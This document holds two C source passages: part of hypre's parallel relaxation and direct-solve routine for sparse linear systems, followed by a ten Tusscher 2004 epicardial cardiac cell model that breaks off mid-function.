if (num_procs > 1)
{
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
v_buf_data = hypre_CTAlloc(HYPRE_Real, hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j=start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg,i+1); j++)
{
v_buf_data[index++] = u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
}
comm_handle = hypre_ParCSRCommHandleCreate( 1, comm_pkg, v_buf_data, Vext_data);
/*-----------------------------------------------------------------
 * Complete the halo exchange before relaxing.
 *-----------------------------------------------------------------*/
hypre_ParCSRCommHandleDestroy(comm_handle);
comm_handle = NULL;
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
if (relax_weight == 1 && omega == 1)
{
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ne-1; i > ns-1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
else
{
for (i = n-1; i > -1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ne-1; i > ns-1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
else
{
for (i = n-1; i > -1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
}
else
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
Vtemp_data[i] = u_data[i];
}
prod = (1.0-relax_weight*omega);
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ne-1; i > ns-1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
else
{
for (i = n-1; i > -1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res0 = 0.0;
res = f_data[i];
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ne-1; i > ns-1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res2 += A_diag_data[jj] * Vtemp_data[ii];
res0 -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
else
{
for (i = n-1; i > -1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
}
break;
case 19: /* Direct solve: use Gaussian elimination */
{
HYPRE_Int n_global = (HYPRE_Int) global_num_rows;
HYPRE_Int first_index = (HYPRE_Int) first_ind;
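/* Every rank gathers the full matrix and right-hand side, solves the
   dense n_global x n_global system redundantly, and keeps only its
   own rows [first_index, first_index + n). */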
/*-----------------------------------------------------------------
* Generate CSR matrix from ParCSRMatrix A
*-----------------------------------------------------------------*/
#ifdef HYPRE_NO_GLOBAL_PARTITION
/* all processors are needed for these routines */
A_CSR = hypre_ParCSRMatrixToCSRMatrixAll(A);
f_vector = hypre_ParVectorToVectorAll(f);
#endif
if (n)
{
#ifndef HYPRE_NO_GLOBAL_PARTITION
A_CSR = hypre_ParCSRMatrixToCSRMatrixAll(A);
f_vector = hypre_ParVectorToVectorAll(f);
#endif
A_CSR_i = hypre_CSRMatrixI(A_CSR);
A_CSR_j = hypre_CSRMatrixJ(A_CSR);
A_CSR_data = hypre_CSRMatrixData(A_CSR);
f_vector_data = hypre_VectorData(f_vector);
A_mat = hypre_CTAlloc(HYPRE_Real, n_global*n_global, HYPRE_MEMORY_HOST);
b_vec = hypre_CTAlloc(HYPRE_Real, n_global, HYPRE_MEMORY_HOST);
/*---------------------------------------------------------------
* Load CSR matrix into A_mat.
*---------------------------------------------------------------*/
for (i = 0; i < n_global; i++)
{
for (jj = A_CSR_i[i]; jj < A_CSR_i[i+1]; jj++)
{
column = A_CSR_j[jj];
A_mat[i*n_global+column] = A_CSR_data[jj];
}
b_vec[i] = f_vector_data[i];
}
hypre_gselim(A_mat,b_vec,n_global,relax_error);
for (i = 0; i < n; i++)
{
u_data[i] = b_vec[first_index+i];
}
hypre_TFree(A_mat, HYPRE_MEMORY_HOST);
hypre_TFree(b_vec, HYPRE_MEMORY_HOST);
hypre_CSRMatrixDestroy(A_CSR);
A_CSR = NULL;
hypre_SeqVectorDestroy(f_vector);
f_vector = NULL;
}
#ifdef HYPRE_NO_GLOBAL_PARTITION
else
{
hypre_CSRMatrixDestroy(A_CSR);
A_CSR = NULL;
hypre_SeqVectorDestroy(f_vector);
f_vector = NULL;
}
#endif
}
break;
case 98: /* Direct solve: Gaussian elimination via LAPACK-style getrf/getrs (with pivoting) */
{
HYPRE_Int n_global = (HYPRE_Int) global_num_rows;
HYPRE_Int first_index = (HYPRE_Int) first_ind;
HYPRE_Int info;
HYPRE_Int one_i = 1;
HYPRE_Int *piv;
/*-----------------------------------------------------------------
* Generate CSR matrix from ParCSRMatrix A
*-----------------------------------------------------------------*/
#ifdef HYPRE_NO_GLOBAL_PARTITION
/* all processors are needed for these routines */
A_CSR = hypre_ParCSRMatrixToCSRMatrixAll(A);
f_vector = hypre_ParVectorToVectorAll(f);
#endif
if (n)
{
#ifndef HYPRE_NO_GLOBAL_PARTITION
A_CSR = hypre_ParCSRMatrixToCSRMatrixAll(A);
f_vector = hypre_ParVectorToVectorAll(f);
#endif
A_CSR_i = hypre_CSRMatrixI(A_CSR);
A_CSR_j = hypre_CSRMatrixJ(A_CSR);
A_CSR_data = hypre_CSRMatrixData(A_CSR);
f_vector_data = hypre_VectorData(f_vector);
A_mat = hypre_CTAlloc(HYPRE_Real, n_global*n_global, HYPRE_MEMORY_HOST);
b_vec = hypre_CTAlloc(HYPRE_Real, n_global, HYPRE_MEMORY_HOST);
/*---------------------------------------------------------------
* Load CSR matrix into A_mat.
*---------------------------------------------------------------*/
for (i = 0; i < n_global; i++)
{
for (jj = A_CSR_i[i]; jj < A_CSR_i[i+1]; jj++)
{
/* need col major */
column = A_CSR_j[jj];
A_mat[i + n_global*column] = A_CSR_data[jj];
}
b_vec[i] = f_vector_data[i];
}
piv = hypre_CTAlloc(HYPRE_Int, n_global, HYPRE_MEMORY_HOST);
/* overwrite A_mat with its LU factorization */
hypre_dgetrf(&n_global, &n_global, A_mat, &n_global, piv, &info);
/* back-substitute: now b_vec = inv(A)*b_vec */
hypre_dgetrs("N", &n_global, &one_i, A_mat, &n_global, piv, b_vec, &n_global, &info);
hypre_TFree(piv, HYPRE_MEMORY_HOST);
for (i = 0; i < n; i++)
{
u_data[i] = b_vec[first_index+i];
}
hypre_TFree(A_mat, HYPRE_MEMORY_HOST);
hypre_TFree(b_vec, HYPRE_MEMORY_HOST);
hypre_CSRMatrixDestroy(A_CSR);
A_CSR = NULL;
hypre_SeqVectorDestroy(f_vector);
f_vector = NULL;
}
#ifdef HYPRE_NO_GLOBAL_PARTITION
else
{
hypre_CSRMatrixDestroy(A_CSR);
A_CSR = NULL;
hypre_SeqVectorDestroy(f_vector);
f_vector = NULL;
}
#endif
}
break;
}
return (relax_error);
}
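/*-----------------------------------------------------------------
 * For reference, the core update used by the hybrid l1 Gauss-Seidel
 * sweeps above is u[i] += (f[i] - (A*u)[i]) / l1_norm[i]. Below is a
 * minimal single-threaded sketch of one forward sweep over a CSR
 * diagonal block; the names are illustrative only, not hypre API.
 *-----------------------------------------------------------------*/
static void l1_gs_forward_sweep_sketch(int n, const int *Ai, const int *Aj,
                                       const double *Ax, const double *l1,
                                       const double *f, double *u)
{
   int i, jj;
   for (i = 0; i < n; i++)
   {
      double res;
      if (l1[i] == 0.0) continue;   /* skip rows with zero l1 norm */
      res = f[i];
      for (jj = Ai[i]; jj < Ai[i+1]; jj++)
      {
         res -= Ax[jj] * u[Aj[jj]]; /* uses already-updated u values */
      }
      u[i] += res / l1[i];          /* l1-scaled correction */
   }
}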
|
tentusscher_epi_2004_S2_2.c | #include <assert.h>
#include <stdlib.h>
#include <math.h> /* exp, log, sqrt, pow used in RHS_cpu (may also come via the model header) */
#include "tentusscher_epi_2004_S2_2.h"
GET_CELL_MODEL_DATA(init_cell_model_data) {
assert(cell_model);
if(get_initial_v)
cell_model->initial_v = INITIAL_V;
if(get_neq)
cell_model->number_of_ode_equations = NEQ;
}
SET_ODE_INITIAL_CONDITIONS_CPU(set_model_initial_conditions_cpu) {
// Default initial conditions
/*
sv[0] = INITIAL_V; // V; millivolt
sv[1] = 0.f; //M
sv[2] = 0.75; //H
sv[3] = 0.75f; //J
sv[4] = 0.f; //Xr1
sv[5] = 1.f; //Xr2
sv[6] = 0.f; //Xs
sv[7] = 1.f; //S
sv[8] = 0.f; //R
sv[9] = 0.f; //D
sv[10] = 1.f; //F
sv[11] = 1.f; //FCa
sv[12] = 1.f; //G
sv[13] = 0.0002; //Cai
sv[14] = 0.2f; //CaSR
sv[15] = 11.6f; //Nai
sv[16] = 138.3f; //Ki
*/
// Elnaz's steady-state initial conditions
real sv_sst[]={-86.5236591284772,0.00130241284471985,0.778613483022969,0.778472769811598,0.000175875277625194,0.484626058693879,0.00294965177778795,0.999998333317616,1.94791112184908e-08,1.90234417053386e-05,0.999779558473224,1.00713872511970,0.999995965310622,4.41551215458988e-05,0.567040008888733,10.2464162625462,139.303734550690};
for (uint32_t i = 0; i < NEQ; i++)
sv[i] = sv_sst[i];
}
SOLVE_MODEL_ODES_CPU(solve_model_odes_cpu) {
uint32_t sv_id;
int i;
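// Each cell's ODE system is independent, so cells are integrated in
// parallel; sv_id is made private since every thread computes its own.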
#pragma omp parallel for private(sv_id)
for (i = 0; i < num_cells_to_solve; i++) {
if(cells_to_solve)
sv_id = cells_to_solve[i];
else
sv_id = i;
for (int j = 0; j < num_steps; ++j) {
solve_model_ode_cpu(dt, sv + (sv_id * NEQ), stim_currents[i]);
}
}
}
void solve_model_ode_cpu(real dt, real *sv, real stim_current) {
assert(sv);
real rY[NEQ], rDY[NEQ];
for(int i = 0; i < NEQ; i++)
rY[i] = sv[i];
RHS_cpu(rY, rDY, stim_current, dt);
for(int i = 0; i < NEQ; i++)
sv[i] = rDY[i];
}
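// Note: RHS_cpu below returns the *updated* state values in rDY_ rather
// than time derivatives: gate variables use the Rush-Larsen exponential
// update y <- y_inf - (y_inf - y)*exp(-dt/tau), and the membrane voltage
// uses an explicit (forward Euler) step.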
void RHS_cpu(const real *sv, real *rDY_, real stim_current, real dt) {
// State variables
real svolt = sv[0];
real sm = sv[1];
real sh = sv[2];
real sj = sv[3];
real sxr1 = sv[4];
real sxr2 = sv[5];
real sxs = sv[6];
real ss = sv[7];
real sr = sv[8];
real sd = sv[9];
real sf = sv[10];
real sfca = sv[11];
real sg = sv[12];
real Cai = sv[13];
real CaSR = sv[14];
real Nai = sv[15];
real Ki = sv[16];
//External concentrations
real Ko=5.4;
real Cao=2.0;
real Nao=140.0;
//Intracellular volumes
real Vc=0.016404;
real Vsr=0.001094;
//Calcium dynamics
real Bufc=0.15f;
real Kbufc=0.001f;
real Bufsr=10.f;
real Kbufsr=0.3f;
real taufca=2.f;
real taug=2.f;
real Vmaxup=0.000425f;
real Kup=0.00025f;
//Constants
const real R = 8314.472f;
const real F = 96485.3415f;
const real T =310.0f;
real RTONF =(R*T)/F;
//Cellular capacitance
real CAPACITANCE=0.185;
//Parameters for currents
//Parameters for IKr
real Gkr=0.096;
//Parameters for Iks
real pKNa=0.03;
// [!] Epicardium cell
real Gks=0.245;
//Parameters for Ik1
real GK1=5.405;
//Parameters for Ito
// [!] Epicardium cell
real Gto=0.294;
//Parameters for INa
real GNa=14.838;
//Parameters for IbNa
real GbNa=0.00029;
//Parameters for INaK
real KmK=1.0;
real KmNa=40.0;
real knak=1.362;
//Parameters for ICaL
real GCaL=0.000175;
//Parameters for IbCa
real GbCa=0.000592;
//Parameters for INaCa
real knaca=1000;
real KmNai=87.5;
real KmCa=1.38;
real ksat=0.1;
real n=0.35;
//Parameters for IpCa
real GpCa=0.825;
real KpCa=0.0005;
//Parameters for IpK;
real GpK=0.0146;
real parameters []={14.2751110459407,0.000197490405913840,0.000138093676576538,0.000459611951400222,0.248312214169369,0.146550920650185,0.141336894566835,4.51002424199619,0.0147942147525980,1.60874334855823,1098.91591518736,0.000497071049372500,0.357179450926053,0.0190817376935230,0.00515881032161095,3.63348608264117e-05};
GNa=parameters[0];
GbNa=parameters[1];
GCaL=parameters[2];
GbCa=parameters[3];
Gto=parameters[4];
Gkr=parameters[5];
Gks=parameters[6];
GK1=parameters[7];
GpK=parameters[8];
knak=parameters[9];
knaca=parameters[10];
Vmaxup=parameters[11];
GpCa=parameters[12];
real arel=parameters[13];
real crel=parameters[14];
real Vleak=parameters[15];
real IKr;
real IKs;
real IK1;
real Ito;
real INa;
real IbNa;
real ICaL;
real IbCa;
real INaCa;
real IpCa;
real IpK;
real INaK;
real Irel;
real Ileak;
real dNai;
real dKi;
real dCai;
real dCaSR;
real A;
// real BufferFactorc;
// real BufferFactorsr;
real SERCA;
real Caisquare;
real CaSRsquare;
real CaCurrent;
real CaSRCurrent;
real fcaold;
real gold;
real Ek;
real Ena;
real Eks;
real Eca;
real CaCSQN;
real bjsr;
real cjsr;
real CaBuf;
real bc;
real cc;
real Ak1;
real Bk1;
real rec_iK1;
real rec_ipK;
real rec_iNaK;
real AM;
real BM;
real AH_1;
real BH_1;
real AH_2;
real BH_2;
real AJ_1;
real BJ_1;
real AJ_2;
real BJ_2;
real M_INF;
real H_INF;
real J_INF;
real TAU_M;
real TAU_H;
real TAU_J;
real axr1;
real bxr1;
real axr2;
real bxr2;
real Xr1_INF;
real Xr2_INF;
real TAU_Xr1;
real TAU_Xr2;
real Axs;
real Bxs;
real Xs_INF;
real TAU_Xs;
real R_INF;
real TAU_R;
real S_INF;
real TAU_S;
real Ad;
real Bd;
real Cd;
real TAU_D;
real D_INF;
real TAU_F;
real F_INF;
real FCa_INF;
real G_INF;
real inverseVcF2=1/(2*Vc*F);
real inverseVcF=1./(Vc*F);
real Kupsquare=Kup*Kup;
// real BufcKbufc=Bufc*Kbufc;
// real Kbufcsquare=Kbufc*Kbufc;
// real Kbufc2=2*Kbufc;
// real BufsrKbufsr=Bufsr*Kbufsr;
// const real Kbufsrsquare=Kbufsr*Kbufsr;
// const real Kbufsr2=2*Kbufsr;
const real exptaufca=exp(-dt/taufca);
const real exptaug=exp(-dt/taug);
real sItot;
//Needed to compute currents
Ek=RTONF*(log((Ko/Ki)));
Ena=RTONF*(log((Nao/Nai)));
Eks=RTONF*(log((Ko+pKNa*Nao)/(Ki+pKNa*Nai)));
Eca=0.5*RTONF*(log((Cao/Cai)));
Ak1=0.1/(1.+exp(0.06*(svolt-Ek-200)));
Bk1=(3.*exp(0.0002*(svolt-Ek+100))+
exp(0.1*(svolt-Ek-10)))/(1.+exp(-0.5*(svolt-Ek)));
rec_iK1=Ak1/(Ak1+Bk1);
rec_iNaK=(1./(1.+0.1245*exp(-0.1*svolt*F/(R*T))+0.0353*exp(-svolt*F/(R*T))));
rec_ipK=1./(1.+exp((25-svolt)/5.98));
//Compute currents
INa=GNa*sm*sm*sm*sh*sj*(svolt-Ena);
ICaL=GCaL*sd*sf*sfca*4*svolt*(F*F/(R*T))*
(exp(2*svolt*F/(R*T))*Cai-0.341*Cao)/(exp(2*svolt*F/(R*T))-1.);
Ito=Gto*sr*ss*(svolt-Ek);
IKr=Gkr*sqrt(Ko/5.4)*sxr1*sxr2*(svolt-Ek);
IKs=Gks*sxs*sxs*(svolt-Eks);
IK1=GK1*rec_iK1*(svolt-Ek);
INaCa=knaca*(1./(KmNai*KmNai*KmNai+Nao*Nao*Nao))*(1./(KmCa+Cao))*
(1./(1+ksat*exp((n-1)*svolt*F/(R*T))))*
(exp(n*svolt*F/(R*T))*Nai*Nai*Nai*Cao-
exp((n-1)*svolt*F/(R*T))*Nao*Nao*Nao*Cai*2.5);
INaK=knak*(Ko/(Ko+KmK))*(Nai/(Nai+KmNa))*rec_iNaK;
IpCa=GpCa*Cai/(KpCa+Cai);
IpK=GpK*rec_ipK*(svolt-Ek);
IbNa=GbNa*(svolt-Ena);
IbCa=GbCa*(svolt-Eca);
//Determine total current
(sItot) = IKr +
IKs +
IK1 +
Ito +
INa +
IbNa +
ICaL +
IbCa +
INaK +
INaCa +
IpCa +
IpK +
stim_current;
//update concentrations
Caisquare=Cai*Cai;
CaSRsquare=CaSR*CaSR;
CaCurrent=-(ICaL+IbCa+IpCa-2.0f*INaCa)*inverseVcF2*CAPACITANCE;
A=arel*CaSRsquare/(0.0625f+CaSRsquare)+crel;
Irel=A*sd*sg;
Ileak=Vleak*(CaSR-Cai);
SERCA=Vmaxup/(1.f+(Kupsquare/Caisquare));
CaSRCurrent=SERCA-Irel-Ileak;
CaCSQN=Bufsr*CaSR/(CaSR+Kbufsr);
dCaSR=dt*(Vc/Vsr)*CaSRCurrent;
bjsr=Bufsr-CaCSQN-dCaSR-CaSR+Kbufsr;
cjsr=Kbufsr*(CaCSQN+dCaSR+CaSR);
CaSR=(sqrt(bjsr*bjsr+4.*cjsr)-bjsr)/2.;
CaBuf=Bufc*Cai/(Cai+Kbufc);
dCai=dt*(CaCurrent-CaSRCurrent);
bc=Bufc-CaBuf-dCai-Cai+Kbufc;
cc=Kbufc*(CaBuf+dCai+Cai);
Cai=(sqrt(bc*bc+4*cc)-bc)/2;
dNai=-(INa+IbNa+3*INaK+3*INaCa)*inverseVcF*CAPACITANCE;
Nai+=dt*dNai;
dKi=-(stim_current+IK1+Ito+IKr+IKs-2*INaK+IpK)*inverseVcF*CAPACITANCE;
Ki+=dt*dKi;
//compute steady state values and time constants
AM=1./(1.+exp((-60.-svolt)/5.));
BM=0.1/(1.+exp((svolt+35.)/5.))+0.10/(1.+exp((svolt-50.)/200.));
TAU_M=AM*BM;
M_INF=1./((1.+exp((-56.86-svolt)/9.03))*(1.+exp((-56.86-svolt)/9.03)));
if (svolt>=-40.)
{
AH_1=0.;
BH_1=(0.77/(0.13*(1.+exp(-(svolt+10.66)/11.1))));
TAU_H= 1.0/(AH_1+BH_1);
}
else
{
AH_2=(0.057*exp(-(svolt+80.)/6.8));
BH_2=(2.7*exp(0.079*svolt)+(3.1e5)*exp(0.3485*svolt));
TAU_H=1.0/(AH_2+BH_2);
}
H_INF=1./((1.+exp((svolt+71.55)/7.43))*(1.+exp((svolt+71.55)/7.43)));
if(svolt>=-40.)
{
AJ_1=0.;
BJ_1=(0.6*exp((0.057)*svolt)/(1.+exp(-0.1*(svolt+32.))));
TAU_J= 1.0/(AJ_1+BJ_1);
}
else
{
AJ_2=(((-2.5428e4)*exp(0.2444*svolt)-(6.948e-6)*
exp(-0.04391*svolt))*(svolt+37.78)/
(1.+exp(0.311*(svolt+79.23))));
BJ_2=(0.02424*exp(-0.01052*svolt)/(1.+exp(-0.1378*(svolt+40.14))));
TAU_J= 1.0/(AJ_2+BJ_2);
}
J_INF=H_INF;
Xr1_INF=1./(1.+exp((-26.-svolt)/7.));
axr1=450./(1.+exp((-45.-svolt)/10.));
bxr1=6./(1.+exp((svolt-(-30.))/11.5));
TAU_Xr1=axr1*bxr1;
Xr2_INF=1./(1.+exp((svolt-(-88.))/24.));
axr2=3./(1.+exp((-60.-svolt)/20.));
bxr2=1.12/(1.+exp((svolt-60.)/20.));
TAU_Xr2=axr2*bxr2;
Xs_INF=1./(1.+exp((-5.-svolt)/14.));
Axs=1100./(sqrt(1.+exp((-10.-svolt)/6)));
Bxs=1./(1.+exp((svolt-60.)/20.));
TAU_Xs=Axs*Bxs;
R_INF=1./(1.+exp((20-svolt)/6.));
S_INF=1./(1.+exp((svolt+20)/5.));
TAU_R=9.5*exp(-(svolt+40.)*(svolt+40.)/1800.)+0.8;
TAU_S=85.*exp(-(svolt+45.)*(svolt+45.)/320.)+5./(1.+exp((svolt-20.)/5.))+3.;
D_INF=1./(1.+exp((-5-svolt)/7.5));
Ad=1.4/(1.+exp((-35-svolt)/13))+0.25;
Bd=1.4/(1.+exp((svolt+5)/5));
Cd=1./(1.+exp((50-svolt)/20));
TAU_D=Ad*Bd+Cd;
F_INF=1./(1.+exp((svolt+20)/7));
//TAU_F=1125*exp(-(svolt+27)*(svolt+27)/300)+80+165/(1.+exp((25-svolt)/10));
TAU_F=1125*exp(-(svolt+27)*(svolt+27)/240)+80+165/(1.+exp((25-svolt)/10)); // Updated from CellML
FCa_INF=(1./(1.+pow((Cai/0.000325),8))+
0.1/(1.+exp((Cai-0.0005)/0.0001))+
0.20/(1.+exp((Cai-0.00075)/0.0008))+
0.23 )/1.46;
if(Cai<0.00035)
G_INF=1./(1.+pow((Cai/0.00035),6));
else
G_INF=1./(1.+pow((Cai/0.00035),16));
//Update gates
rDY_[1] = M_INF-(M_INF-sm)*exp(-dt/TAU_M);
rDY_[2] = H_INF-(H_INF-sh)*exp(-dt/TAU_H);
rDY_[3] = J_INF-(J_INF-sj)*exp(-dt/TAU_J);
rDY_[4] = Xr1_INF-(Xr1_INF-sxr1)*exp(-dt/TAU_Xr1);
rDY_[5] = Xr2_INF-(Xr2_INF-sxr2)*exp(-dt/TAU_Xr2);
rDY_[6] = Xs_INF-(Xs_INF-sxs)*exp(-dt/TAU_Xs);
rDY_[7] = S_INF-(S_INF-ss)*exp(-dt/TAU_S);
rDY_[8] = R_INF-(R_INF-sr)*exp(-dt/TAU_R);
rDY_[9] = D_INF-(D_INF-sd)*exp(-dt/TAU_D);
rDY_[10] = F_INF-(F_INF-sf)*exp(-dt/TAU_F);
fcaold= sfca;
sfca = FCa_INF-(FCa_INF-sfca)*exptaufca;
if(sfca>fcaold && (svolt)>-37.0)
sfca = fcaold;
